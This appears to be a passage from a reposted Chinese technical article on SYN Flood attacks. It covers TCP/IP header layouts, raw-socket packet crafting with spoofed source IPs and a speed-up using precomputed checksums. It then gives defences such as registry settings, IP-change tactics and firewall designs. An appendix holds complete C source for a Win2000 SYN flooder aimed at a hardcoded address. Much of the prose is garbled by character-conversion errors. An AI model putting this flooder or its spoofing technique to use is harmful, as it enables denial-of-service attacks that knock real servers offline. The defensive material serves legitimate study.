+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| IP首部 | TCP首部 | TCP数据段 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
图一 TCP报文结构
如上图所示,一个TCP报文由三个部分构成:20字节的IP首部、20字节的TCP首部与不定长的数据段,(实际操做时可能会有可选的IP选项,这种状况 下TCP首部向后顺延)因为咱们只是发送一个SYN信号,并不传递任何数据,因此TCP数据段为空。TCP首部的数据结构为:
0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 十六位源端口号 | 十六位目标端口号 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 三十二位序列号 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 三十二位确认号 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 四位 | |U|A|P|R|S|F| |
| 首部 |六位保留位 |R|C|S|S|Y|I| 十六位窗口大小 |
| 长度 | |G|K|H|T|N|N| |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 十六位校验和 | 十六位紧急指针 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 选项(如有) |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 数据(如有) |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
图二 TCP首部结构
根据TCP报文格式,咱们定义一个结构TCP_HEADER用来存放TCP首部:
typedef struct _tcphdr
{
USHORT th_sport; //16位源端口
USHORT th_dport; //16位目的端口
unsigned int th_seq; //32位序列号
unsigned int th_ack; //32位确认号
unsigned char th_lenres; //4位首部长度+6位保留字中的4位
unsigned char th_flag; //2位保留字+6位标志位
USHORT th_win; //16位窗口大小
USHORT th_sum; //16位校验和
USHORT th_urp; //16位紧急数据偏移量
}TCP_HEADER;
经过以正确的数据填充这个结构并将TCP_HEADER.th_flag赋值为2(二进制的00000010)咱们能制造一个SYN的TCP报文,经过大 量发送这个报文能够实现SYN Flood的效果。可是为了进行IP欺骗从而隐藏本身,也为了躲避服务器的SYN Cookie检查,还须要直接对IP首部进行操做:
0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 版本 | 长度 | 八位服务类型 | 十六位总长度 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 十六位标识 | 标志| 十三位片偏移 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 八位生存时间 | 八位协议 | 十六位首部校验和 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 三十二位源IP地址 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 三十二位目的IP地址 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 选项(如有) |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 数据 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
图三 IP首部结构
一样定义一个IP_HEADER来存放IP首部
typedef struct _iphdr
{
unsigned char h_verlen; //4位首部长度+4位IP版本号
unsigned char tos; //8位服务类型TOS
unsigned short total_len; //16位总长度(字节)
unsigned short ident; //16位标识
unsigned short frag_and_flags; //3位标志位
unsigned char ttl; //8位生存时间 TTL
unsigned char proto; //8位协议号(TCP, UDP 或其余)
unsigned short checksum; //16位IP首部校验和
unsigned int sourceIP; //32位源IP地址
unsigned int destIP; //32位目的IP地址
}IP_HEADER;
而后经过SockRaw=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED));
创建一个原始套接口,因为咱们的IP源地址是伪造的,因此不能期望系统帮咱们计算IP校验和,咱们得在在setsockopt中设置IP_HDRINCL告诉系统本身填充IP首部并本身计算校验和:
flag=TRUE;
setsockopt(SockRaw,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof(int));
IP校验和的计算方法是:首先将IP首部的校验和字段设为0(IP_HEADER.checksum=0),而后计算整个IP首部(包括选项)的二进制反码的和,一个标准的校验和函数以下所示:
USHORT checksum(USHORT *buffer, int size)
{
unsigned long cksum=0;
while(size >1) {
cksum+=*buffer++;
size -=sizeof(USHORT);
}
if(size ) cksum += *(UCHAR*)buffer;
cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >>16);
return (USHORT)(~cksum);
}
这个函数并无通过任何的优化,因为校验和函数是TCP/IP协议中被调用最多函数之一,因此通常说来,在实现TCP/IP栈时,会根据操做系统对校验和函数进行优化。
TCP首部检验和与IP首部校验和的计算方法相同,在程序中使用同一个函数来计算。
须要注意的是,因为TCP首部中不包含源地址与目标地址等信息,为了保证TCP校验的有效性,在进行TCP校验和的计算时,须要增长一个TCP伪首部的校验和,定义以下:
struct
{
unsigned long saddr; //源地址
unsigned long daddr; //目的地址
char mbz; //置空
char ptcl; //协议类型
unsigned short tcpl; //TCP长度
}psd_header;
而后咱们将这两个字段复制到同一个缓冲区SendBuf中并计算TCP校验和:
memcpy(SendBuf,&psd_header,sizeof(psd_header));
memcpy(SendBuf+sizeof(psd_header),&tcp_header,sizeof(tcp_header));
tcp_header.th_sum=checksum((USHORT *)SendBuf,sizeof(psd_header)+sizeof(tcp_header));
计算IP校验和的时候不须要包括TCP伪首部:
memcpy(SendBuf,&ip_header,sizeof(ip_header));
memcpy(SendBuf+sizeof(ip_header),&tcp_header,sizeof(tcp_header));
ip_header.checksum=checksum((USHORT *)SendBuf, sizeof(ip_header)+sizeof(tcp_header));
再将计算过校验和的IP首部与TCP首部复制到同一个缓冲区中就能够直接发送了:
memcpy(SendBuf,&ip_header,sizeof(ip_header));
sendto(SockRaw,SendBuf,datasize,0,(struct sockaddr*) &DestAddr,sizeof(DestAddr));
由于整个TCP报文中的全部部分都是咱们本身写入的(操做系统不会作任何干涉),因此咱们能够在IP首部中放置随机的源IP地址,若是伪造的源IP地址确 实有人使用,他在接收到服务器的SYN+ACK报文后会发送一个RST报文(标志位为00000100),通知服务器端不须要等待一个无效的链接,但是如 果这个伪造IP并无绑定在任何的主机上,不会有任何设备去通知主机该链接是无效的(这正是TCP协议的缺陷),主机将不断重试直到SYN Timeout时间后才能丢弃这个无效的半链接。因此当攻击者使用主机分布很稀疏的IP地址段进行假装IP的SYN Flood攻击时,服务器主机承受的负荷会至关的高,根据测试,一台PIII 550MHz+128MB+100Mbps的机器使用通过初步优化的SYN Flooder程序能够以16,000包/秒的速度发送TCP SYN报文,这样的攻击力已经足以拖垮大部分WEB服务器了。
稍微动动脑筋咱们就会发现,想对SYN Flooder程序进行优化是很简单的,从程序构架来看,攻击时循环内的代码主要是进行校验和计算与缓冲区的填充,通常的思路是提升校验和计算的速度,我 甚至见过用汇编代码编写的校验和函数,实际上,有另一个变通的方法能够轻松实现优化而又不须要高深的编程技巧和数学知识,(老实说吧,我数学比较 差:P),咱们仔细研究了两个不一样源地址的TCP SYN报文后发现,两个报文的大部分字段相同(好比目的地址、协议等等),只有源地址和校验和不一样(若是为了隐蔽,源端口也能够有变化,可是并不影响咱们 算法优化的思路),若是咱们事先计算好大量的源地址与校验和的对应关系表(若是其余的字段有变化也能够加入这个表),等计算完毕了攻击程序就只须要单纯的 组合缓冲区并发送(用指针来直接操做缓冲区的特定位置,从事先计算好的对应关系表中读出数据,替换缓冲区相应字段),这种简单的工做彻底取决于系统发送 IP包的速度,与程序的效率没有任何关系,这样,即便是CPU主频较低的主机也能快速的发送大量TCP SYN攻击包。若是考虑到缓冲区拼接的时间,甚至能够定义一个很大的缓冲区数组,填充完毕后再发送(雏鹰给这种方法想了一个很贴切的比喻:火箭炮装弹虽然 很慢,可是一旦炮弹上膛了之后就能够连续猛烈地发射了:)。
第三部分 SYN Flood攻击的监测与防护初探
对于SYN Flood攻击,目前尚没有很好的监测和防护方法,不过若是系统管理员熟悉攻击方法和系统架构,经过一系列的设定,也能从必定程度上下降被攻击系统的负荷,减轻负面的影响。(这正是我撰写本文的主要目的)
通常来讲,若是一个系统(或主机)负荷忽然升高甚至失去响应,使用Netstat 命令能看到大量SYN_RCVD的半链接(数量>500或占总链接数的10%以上),能够认定,这个系统(或主机)遭到了SYN Flood攻击。
遭到SYN Flood攻击后,首先要作的是取证,经过Netstat –n –p tcp >resault.txt记录目前全部TCP链接状态是必要的,若是有嗅探器,或者TcpDump之类的工具,记录TCP SYN报文的全部细节也有助于之后追查和防护,须要记录的字段有:源地址、IP首部中的标识、TCP首部中的序列号、TTL值等,这些信息虽然极可能是攻 击者伪造的,可是用来分析攻击者的心理状态和攻击程序也不无帮助。特别是TTL值,若是大量的攻击包彷佛来自不一样的IP可是TTL值却相同,咱们每每能推 断出攻击者与咱们之间的路由器距离,至少也能够经过过滤特定TTL值的报文下降被攻击系统的负荷(在这种状况下TTL值与攻击报文不一样的用户就能够恢复正 常访问)
前面曾经提到能够经过缩短SYN Timeout时间和设置SYN Cookie来进行SYN攻击保护,对于Win2000系统,还能够经过修改注册表下降SYN Flood的危害,在注册表中做以下改动:
首先,打开regedit,找到HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters
增长一个SynAttackProtect的键值,类型为REG_DWORD,取值范围是0-2,这个值决定了系统受到SYN攻击时采起的保护措施,包括减小系统SYN+ACK的重试的次数等,默认值是0(没有任何保护措施),推荐设置是2;
增长一个TcpMaxHalfOpen的键值,类型为REG_DWORD,取值范围是100-0xFFFF,这个值是系统容许同时打开的半链接,默认状况 下WIN2K PRO和SERVER是100,ADVANCED SERVER是500,这个值很难肯定,取决于服务器TCP负荷的情况和可能受到的攻击强度,具体的值须要通过试验才能决定。
增长一个TcpMaxHalfOpenRetried的键值,类型为REG_DWORD,取值范围是80-0xFFFF,默认状况下WIN2K PRO和SERVER是80,ADVANCED SERVER是400,这个值决定了在什么状况下系统会打开SYN攻击保护。
咱们来分析一下Win2000的SYN攻击保护机制:正常状况下,Win2K对TCP链接的三次握手有一个常规的设置,包括SYN Timeout时间、SYN-ACK的重试次数和SYN报文从路由器到系统再到Winsock的延时等,这个常规设置是针对系统性能进行优化的(安全和性 能每每相互矛盾)因此能够给用户提供方便快捷的服务;一旦服务器受到攻击,SYN半链接的数量超过TcpMaxHalfOpenRetried的设置,系 统会认为本身受到了SYN Flood攻击,此时设置在SynAttackProtect键值中的选项开始做用,SYN Timeout时间被减短,SYN-ACK的重试次数减小,系统也会自动对缓冲区中的报文进行延时,避免对TCP/IP堆栈形成过大的冲击,力图将攻击危 害减到最低;若是攻击强度不断增大,超过了TcpMaxHalfOpen值,此时系统已经不能提供正常的服务了,更重要的是保证系统不会崩溃,因此系统将 会丢弃任何超出TcpMaxHalfOpen值范围的SYN报文(应该是使用随机丢包策略),保证系统的稳定性。
因此,对于须要进行SYN攻击保护的系统,咱们能够测试/预测一下访问峰值时期的半链接打开量,以其做为参考设定 TcpMaxHalfOpenRetried的值(保留必定的余量),而后再以TcpMaxHalfOpenRetried的1.25倍做为 TcpMaxHalfOpen值,这样能够最大限度地发挥WIN2K自身的SYN攻击保护机制。
经过设置注册表防护SYN Flood攻击,采用的是“挨打”的策略,不管系统如何强大,始终不能光靠挨打支撑下去,除了挨打以外,“退让”也是一种比较有效的方法。
退让策略是基于SYN Flood攻击代码的一个缺陷,咱们从新来分析一下SYN Flood攻击者的流程:SYN Flood程序有两种攻击方式,基于IP的和基于域名的,前者是攻击者本身进行域名解析并将IP地址传递给攻击程序,后者是攻击程序自动进行域名解析,但 是它们有一点是相同的,就是一旦攻击开始,将不会再进行域名解析,咱们的切入点正是这里:假设一台服务器在受到SYN Flood攻击后迅速更换本身的IP地址,那么攻击者仍在不断攻击的只是一个空的IP地址,并无任何主机,而防护方只要将DNS解析更改到新的IP地址 就能在很短的时间内(取决于DNS的刷新时间)恢复用户经过域名进行的正常访问。为了迷惑攻击者,咱们甚至能够放置一台“牺牲”服务器让攻击者知足于攻击 的“效果”(因为DNS缓冲的缘由,只要攻击者的浏览器不重起,他访问的仍然是原先的IP地址)。
一样的缘由,在众多的负载均衡架构中,基于DNS解析的负载均衡自己就拥有对SYN Flood的免疫力,基于DNS解析的负载均衡能将用户的请求分配到不一样IP的服务器主机上,攻击者攻击的永远只是其中一台服务器,虽说攻击者也能不断 去进行DNS请求从而打破这种“退让”策略,可是一来这样增长了攻击者的成本,二来过多的DNS请求能够帮助咱们追查攻击者的真正踪影(DNS请求不一样于 SYN攻击,是须要返回数据的,因此很难进行IP假装)。
对于防火墙来讲,防护SYN Flood攻击的方法取决于防火墙工做的基本原理,通常说来,防火墙能够工做在TCP层之上或IP层之下,工做在TCP层之上的防火墙称为网关型防火墙,网关型防火墙与服务器、客户机之间的关系以下图所示:
外部TCP链接 内部TCP链接
[客户机] =================>[防火墙] =================>[服务器]
如上图所示,客户机与服务器之间并无真正的TCP链接,客户机与服务器之间的全部数据交换都是经过防火墙代理的,外部的DNS解析也一样指向防 火墙,因此若是网站被攻击,真正受到攻击的是防火墙,这种防火墙的优势是稳定性好,抗打击能力强,可是由于全部的TCP报文都须要通过防火墙转发,因此效 率比较低因为客户机并不直接与服务器创建链接,在TCP链接没有完成时防火墙不会去向后台的服务器创建新的TCP链接,因此攻击者没法越过防火墙直接攻击 后台服务器,只要防火墙自己作的足够强壮,这种架构能够抵抗至关强度的SYN Flood攻击。可是因为防火墙实际创建的TCP链接数为用户链接数的两倍(防火墙两端都须要创建TCP链接),同时又代理了全部的来自客户端的TCP请 求和数据传送,在系统访问量较大时,防火墙自身的负荷会比较高,因此这种架构并不能适用于大型网站。(我感受,对于这样的防火墙架构,使用 TCP_STATE攻击估计会至关有效:)
工做在IP层或IP层之下的防火墙(路由型防火墙)工做原理有所不一样,它与服务器、客户机的关系以下图所示:
[防火墙] 数据包修改转发
[客户机]========|=======================>[服务器]
TCP链接
客户机直接与服务器进行TCP链接,防火墙起的是路由器的做用,它截获全部经过的包并进行过滤,经过过滤的包被转发给服务器,外部的DNS解析也 直接指向服务器,这种防火墙的优势是效率高,能够适应100Mbps-1Gbps的流量,可是这种防火墙若是配置不当,不只可让攻击者越过防火墙直接攻 击内部服务器,甚至有可能放大攻击的强度,致使整个系统崩溃。
在这两种基本模型以外,有一种新的防火墙模型,我我的认为仍是比较巧妙的,它集中了两种防火墙的优点,这种防火墙的工做原理以下所示:
第一阶段,客户机请求与防火墙创建链接:
SYN SYN+ACK ACK
[客户机]---- >[防火墙] => [防火墙]-------- >[客户机] => [客户机]--- >[防火墙]
第二阶段,防火墙假装成客户机与后台的服务器创建链接
[防火墙]< =========== >[服务器]
TCP链接
第三阶段,以后全部从客户机来的TCP报文防火墙都直接转发给后台的服务器
防火墙转发
[客户机]< ======|======= >[服务器]
TCP链接
这种结构吸收了上两种防火墙的优势,既能彻底控制全部的SYN报文,又不须要对全部的TCP数据报文进行代理,是一种一箭双鵰的方法。
近来,国外和国内的一些防火墙厂商开始研究带宽控制技术,若是能真正作到严格控制、分配带宽,就能很大程度上防护绝大多数的拒绝服务攻击,咱们仍是拭目以待吧。
附录:Win2000下的SYN Flood程序
改编自Linux下Zakath编写的SYN Flooder
编译环境:VC++6.0,编译时须要包含ws2_32.lib
//////////////////////////////////////////////////////////////////////////
// //
// SYN Flooder For Win2K by Shotgun //
// //
// THIS PROGRAM IS MODIFIED FROM A LINUX VERSION BY Zakath //
// THANX Lion Hook FOR PROGRAM OPTIMIZATION //
// //
// Released: [2001.4] //
// Author: [Shotgun] //
// Homepage: //
// [ http://IT.Xici.Net] //
// [ http://WWW.Patching.Net] // // // ////////////////////////////////////////////////////////////////////////// #include <winsock2.h> #include <Ws2tcpip.h> #include <stdio.h> #include <stdlib.h> #define SEQ 0x28376839 #define SYN_DEST_IP "192.168.15.250"//被攻击的IP #define FAKE_IP "10.168.150.1" //假装IP的起始值,本程序的假装IP覆盖一个B类网段 #define STATUS_FAILED 0xFFFF //错误返回值 typedef struct _iphdr //定义IP首部 { unsigned char h_verlen; //4位首部长度,4位IP版本号 unsigned char tos; //8位服务类型TOS unsigned short total_len; //16位总长度(字节) unsigned short ident; //16位标识 unsigned short frag_and_flags; //3位标志位 unsigned char ttl; //8位生存时间 TTL unsigned char proto; //8位协议 (TCP, UDP 或其余) unsigned short checksum; //16位IP首部校验和 unsigned int sourceIP; //32位源IP地址 unsigned int destIP; //32位目的IP地址 }IP_HEADER; struct //定义TCP伪首部 { unsigned long saddr; //源地址 unsigned long daddr; //目的地址 char mbz; char ptcl; //协议类型 unsigned short tcpl; //TCP长度 }psd_header; typedef struct _tcphdr //定义TCP首部 { USHORT th_sport; //16位源端口 USHORT th_dport; //16位目的端口 unsigned int th_seq; //32位序列号 unsigned int th_ack; //32位确认号 unsigned char th_lenres; //4位首部长度/6位保留字 unsigned char th_flag; //6位标志位 USHORT th_win; //16位窗口大小 USHORT th_sum; //16位校验和 USHORT th_urp; //16位紧急数据偏移量 }TCP_HEADER; //CheckSum:计算校验和的子函数 USHORT checksum(USHORT *buffer, int size) { unsigned long cksum=0; while(size >1) { cksum+=*buffer++; size -=sizeof(USHORT); } if(size ) { cksum += *(UCHAR*)buffer; } cksum = (cksum >> 16) + (cksum & 0xffff); cksum += (cksum >>16); return (USHORT)(~cksum); } // SynFlood主函数 int main() { int datasize,ErrorCode,counter,flag,FakeIpNet,FakeIpHost; int TimeOut=2000,SendSEQ=0; char SendBuf[128]={0}; char RecvBuf[65535]={0}; WSADATA wsaData; SOCKET SockRaw=(SOCKET)NULL; struct sockaddr_in DestAddr; IP_HEADER ip_header; TCP_HEADER tcp_header; //初始化SOCK_RAW if((ErrorCode=WSAStartup(MAKEWORD(2,1),&wsaData))!=0){ fprintf(stderr,"WSAStartup failed: %d\n",ErrorCode); ExitProcess(STATUS_FAILED); } SockRaw=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED)); if (SockRaw==INVALID_SOCKET){ fprintf(stderr,"WSASocket() failed: %d\n",WSAGetLastError()); ExitProcess(STATUS_FAILED); } flag=TRUE; //设置IP_HDRINCL以本身填充IP首部 ErrorCode=setsockopt(SockRaw,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof(int)); If (ErrorCode==SOCKET_ERROR) printf("Set IP_HDRINCL Error!\n"); __try{ //设置发送超时 ErrorCode=setsockopt(SockRaw,SOL_SOCKET,SO_SNDTIMEO,(char*)&TimeOut,sizeof(TimeOut)); if(ErrorCode==SOCKET_ERROR){ fprintf(stderr,"Failed to set send TimeOut: %d\n",WSAGetLastError()); __leave; } memset(&DestAddr,0,sizeof(DestAddr)); DestAddr.sin_family=AF_INET; DestAddr.sin_addr.s_addr=inet_addr(SYN_DEST_IP); FakeIpNet=inet_addr(FAKE_IP); FakeIpHost=ntohl(FakeIpNet); //填充IP首部 ip_header.h_verlen=(4<<4 | sizeof(ip_header)/sizeof(unsigned long)); //高四位IP版本号,低四位首部长度 ip_header.total_len=htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER)); //16位总长度(字节) ip_header.ident=1; //16位标识 ip_header.frag_and_flags=0; //3位标志位 ip_header.ttl=128; //8位生存时间TTL ip_header.proto=IPPROTO_TCP; //8位协议(TCP,UDP…) ip_header.checksum=0; //16位IP首部校验和 ip_header.sourceIP=htonl(FakeIpHost+SendSEQ); //32位源IP地址 ip_header.destIP=inet_addr(SYN_DEST_IP); //32位目的IP地址 //填充TCP首部 tcp_header.th_sport=htons(7000); //源端口号 tcp_header.th_dport=htons(8080); //目的端口号 tcp_header.th_seq=htonl(SEQ+SendSEQ); //SYN序列号 tcp_header.th_ack=0; //ACK序列号置为0 tcp_header.th_lenres=(sizeof(TCP_HEADER)/4<<4|0); //TCP长度和保留位 tcp_header.th_flag=2; //SYN 标志 tcp_header.th_win=htons(16384); //窗口大小 tcp_header.th_urp=0; //偏移 tcp_header.th_sum=0; //校验和 //填充TCP伪首部(用于计算校验和,并不真正发送) psd_header.saddr=ip_header.sourceIP; //源地址 psd_header.daddr=ip_header.destIP; //目的地址 psd_header.mbz=0; psd_header.ptcl=IPPROTO_TCP; //协议类型 psd_header.tcpl=htons(sizeof(tcp_header)); //TCP首部长度 while(1) { //每发送10,240个报文输出一个标示符 printf("."); for(counter=0;counter<10240;counter++){ if(SendSEQ++==65536) SendSEQ=1; //序列号循环 //更改IP首部 ip_header.checksum=0; //16位IP首部校验和 ip_header.sourceIP=htonl(FakeIpHost+SendSEQ); //32位源IP地址 //更改TCP首部 tcp_header.th_seq=htonl(SEQ+SendSEQ); //SYN序列号 tcp_header.th_sum=0; //校验和 //更改TCP Pseudo Header psd_header.saddr=ip_header.sourceIP; //计算TCP校验和,计算校验和时须要包括TCP pseudo header memcpy(SendBuf,&psd_header,sizeof(psd_header)); memcpy(SendBuf+sizeof(psd_header),&tcp_header,sizeof(tcp_header)); tcp_header.th_sum=checksum((USHORT *)SendBuf,sizeof(psd_header)+sizeof(tcp_header)); //计算IP校验和 memcpy(SendBuf,&ip_header,sizeof(ip_header)); memcpy(SendBuf+sizeof(ip_header),&tcp_header,sizeof(tcp_header)); memset(SendBuf+sizeof(ip_header)+sizeof(tcp_header),0,4); datasize=sizeof(ip_header)+sizeof(tcp_header); ip_header.checksum=checksum((USHORT *)SendBuf,datasize); //填充发送缓冲区 memcpy(SendBuf,&ip_header,sizeof(ip_header)); //发送TCP报文 ErrorCode=sendto(SockRaw, SendBuf, datasize, 0, (struct sockaddr*) &DestAddr, sizeof(DestAddr)); if (ErrorCode==SOCKET_ERROR) printf("\nSend Error:%d\n",GetLastError()); }//End of for }//End of While }//End of try __finally { if (SockRaw != INVALID_SOCKET) closesocket(SockRaw); WSACleanup(); } return 0; }
相关文章
- 1. SYN Flood攻击的基本原理及防护
- 2. 分析syn flood的攻击原理,如何防护syn flood攻击
- 3. 浅析SYN FLOOD攻击原理
- 4. SYN Flood攻击原理与防范
- 5. SYN-flood攻击
- 6. SYN Flood攻击
- 7. Syn Flood 攻击
- 8. 【网络编程】SYN Flood (SYN洪水攻击)原理及防阻
- 9. SYN flood攻击及SYN cookie原理分析
- 10. SYN Flood 是什么?
- 更多相关文章...
- • MyBatis的工作原理 - MyBatis教程
- • Lua 基本语法 - Lua 教程
- • Kotlin学习(二)基本类型
- • Kotlin学习(一)基本语法
相关标签/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
最新文章
- 1. Appium入门
- 2. Spring WebFlux 源码分析(2)-Netty 服务器启动服务流程 --TBD
- 3. wxpython入门第六步(高级组件)
- 4. CentOS7.5安装SVN和可视化管理工具iF.SVNAdmin
- 5. jedis 3.0.1中JedisPoolConfig对象缺少setMaxIdle、setMaxWaitMillis等方法,问题记录
- 6. 一步一图一代码,一定要让你真正彻底明白红黑树
- 7. 2018-04-12—(重点)源码角度分析Handler运行原理
- 8. Spring AOP源码详细解析
- 9. Spring Cloud(1)
- 10. python简单爬去油价信息发送到公众号
欢迎关注本站公众号,获取更多信息
